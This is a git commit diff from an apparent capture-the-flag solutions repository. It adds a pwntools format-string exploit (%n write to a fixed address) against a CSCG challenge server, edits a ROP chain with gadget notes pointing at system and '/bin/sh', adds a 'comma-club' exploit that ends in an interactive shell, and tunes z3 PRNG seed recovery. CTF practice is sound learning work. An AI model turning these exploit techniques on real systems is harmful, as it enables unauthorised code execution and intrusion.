dingdong
This commit is contained in:
2
.gitignore
vendored
2
.gitignore
vendored
@@ -11,3 +11,5 @@ insomnihack24/web/mathematical/.venv/
|
|||||||
.venv
|
.venv
|
||||||
|
|
||||||
__pycache__
|
__pycache__
|
||||||
|
|
||||||
|
core.*
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
@@ -9,7 +9,7 @@ LOCAL = True # Change to False if connecting remotely
|
|||||||
if LOCAL:
|
if LOCAL:
|
||||||
p = process(context.binary.path)
|
p = process(context.binary.path)
|
||||||
else:
|
else:
|
||||||
p = remote("39d9389ef3a77235a475377e-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
|
p = remote("75143f5062f22bfeb9302387-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
|
||||||
def send_payload(payload):
|
def send_payload(payload):
|
||||||
p.sendline(payload)
|
p.sendline(payload)
|
||||||
|
|
||||||
@@ -21,11 +21,22 @@ def interact():
|
|||||||
|
|
||||||
bug_addr = 0x40406c
|
bug_addr = 0x40406c
|
||||||
|
|
||||||
|
|
||||||
# Example interaction
|
# Example interaction
|
||||||
recv_until(b'What is your name?')
|
recv_until(b'What is your name?')
|
||||||
payload = b"%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n"
|
|
||||||
|
format_string = b""
|
||||||
|
format_string += b"%0.0s" * 5
|
||||||
|
format_string += b"%0.0s" * 10
|
||||||
|
format_string += b"%n"
|
||||||
|
format_string += b"\n" * (8 - (len(format_string) % 8))
|
||||||
|
print(len(format_string) / 8)
|
||||||
|
format_string += p64(bug_addr)
|
||||||
|
|
||||||
|
print(format_string)
|
||||||
|
|
||||||
print("enter if gdb attached")
|
print("enter if gdb attached")
|
||||||
input()
|
input()
|
||||||
send_payload(payload)
|
send_payload(format_string)
|
||||||
|
|
||||||
interact() # Keep the shell open
|
interact() # Keep the shell open
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -39,7 +39,7 @@ def interact():
|
|||||||
|
|
||||||
|
|
||||||
ropchain = [
|
ropchain = [
|
||||||
b"3", b"2", b"6", b"13", b"12", b"11", b"1", b"-1"
|
b"3", b"2", b"6", b"13", b"12", b"-1"
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -7,5 +7,4 @@ r10 = binsh_puts_diff
|
|||||||
6 -> rax = 0, rsi = 0
|
6 -> rax = 0, rsi = 0
|
||||||
13 -> rdi = trash, rsi = puts
|
13 -> rdi = trash, rsi = puts
|
||||||
12 -> rcx = binsh
|
12 -> rcx = binsh
|
||||||
11 -> r8 = r9, r9 = r8
|
|
||||||
1 -> rbx = system
|
|
||||||
|
|||||||
20
hackthevote/pwn/comma-club/exploit.py
Normal file
20
hackthevote/pwn/comma-club/exploit.py
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
|
||||||
|
# A custom template for binary exploitation that uses pwntools.
|
||||||
|
# Examples:
|
||||||
|
# python exploit.py DEBUG NOASLR GDB
|
||||||
|
# python exploit.py DEBUG REMOTE
|
||||||
|
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
with process("./challenge") as p:
|
||||||
|
print(p.recvuntil(b'>').decode())
|
||||||
|
p.sendline("1".encode())
|
||||||
|
print(p.recvuntil(b'>').decode())
|
||||||
|
for i in range(3000):
|
||||||
|
p.sendline("1".encode())
|
||||||
|
print(p.recvuntil(b'>').decode())
|
||||||
|
p.sendline(b"584057")
|
||||||
|
print(p.recvline())
|
||||||
|
p.interactive()
|
||||||
|
|
||||||
|
|
||||||
@@ -6,10 +6,17 @@ import sys
|
|||||||
|
|
||||||
|
|
||||||
def ROL(X, N):
|
def ROL(X, N):
|
||||||
return ((((X) << (N)) | ((X) >> (64 - (N)))) % (2 ** 64))
|
if isinstance(X, z3.BitVecRef):
|
||||||
|
return z3.RotateLeft(X,N)
|
||||||
|
else:
|
||||||
|
return ((((X) << (N)) | ((X) >> (64 - (N)))) % (2 ** 64))
|
||||||
|
|
||||||
|
|
||||||
def ROR(X, N):
|
def ROR(X, N):
|
||||||
return ((((X) >> (N)) | ((X) << (64 - (N)))) % (2 ** 64))
|
if isinstance(X, z3.BitVecRef):
|
||||||
|
return z3.RotateRight(X,N)
|
||||||
|
else:
|
||||||
|
return ((((X) >> (N)) | ((X) << (64 - (N)))) % (2 ** 64))
|
||||||
|
|
||||||
def custom_random(state):
|
def custom_random(state):
|
||||||
NEW_STATE = ROL(state,30) ^ ROR(state,12) ^ ROL(state,42) ^ ROL(state,4) ^ ROR(state,5);
|
NEW_STATE = ROL(state,30) ^ ROR(state,12) ^ ROL(state,42) ^ ROL(state,4) ^ ROR(state,5);
|
||||||
|
|||||||
@@ -24,6 +24,7 @@ def get_seed_for_sequence(bytesequence):
|
|||||||
s = z3.Solver()
|
s = z3.Solver()
|
||||||
base_state = z3.BitVec("base_state", 64)
|
base_state = z3.BitVec("base_state", 64)
|
||||||
cur_state = base_state
|
cur_state = base_state
|
||||||
|
s.add(base_state > 0)
|
||||||
for byte in bytesequence:
|
for byte in bytesequence:
|
||||||
gen_byte, cur_state = custom_random(cur_state)
|
gen_byte, cur_state = custom_random(cur_state)
|
||||||
s.add(gen_byte == byte)
|
s.add(gen_byte == byte)
|
||||||
@@ -44,7 +45,7 @@ def gen_sequence(seed, length):
|
|||||||
return bytes(r)
|
return bytes(r)
|
||||||
|
|
||||||
|
|
||||||
test = random.getrandbits(32).to_bytes(4)
|
test = random.getrandbits(32).to_bytes(4, "little")
|
||||||
seed = get_seed_for_sequence(test)
|
seed = get_seed_for_sequence(test)
|
||||||
print(seed)
|
print(seed)
|
||||||
print(test)
|
print(test)
|
||||||
|
|||||||
@@ -7,10 +7,10 @@ The license key has the form XXXXX-XXXXX-XXXXX-XXXXX
|
|||||||
The template code will mostly ignore the '-' (since the binary does it mostly as well) and `license[5]` will refer to the 6th X
|
The template code will mostly ignore the '-' (since the binary does it mostly as well) and `license[5]` will refer to the 6th X
|
||||||
|
|
||||||
For context:
|
For context:
|
||||||
- The binary will perform some general constraint checks on the license
|
|
||||||
- The binary will extract 4 binaries of different architectures that each contain different parts of a constraint set and are then executed
|
|
||||||
- The constraints are described in the template and the relevant arrays extracted already
|
|
||||||
|
|
||||||
|
- The binary will perform some general constraint checks on the license
|
||||||
|
- The binary will extract 4 binaries of different architectures that each contain different parts of a constraint set and are then executed
|
||||||
|
- The constraints are described in the template and the relevant arrays extracted already
|
||||||
|
|
||||||
To validate your license key, run the binary (it requires qemu and some dependencies, so using the Dockerfile might be easiest):
|
To validate your license key, run the binary (it requires qemu and some dependencies, so using the Dockerfile might be easiest):
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user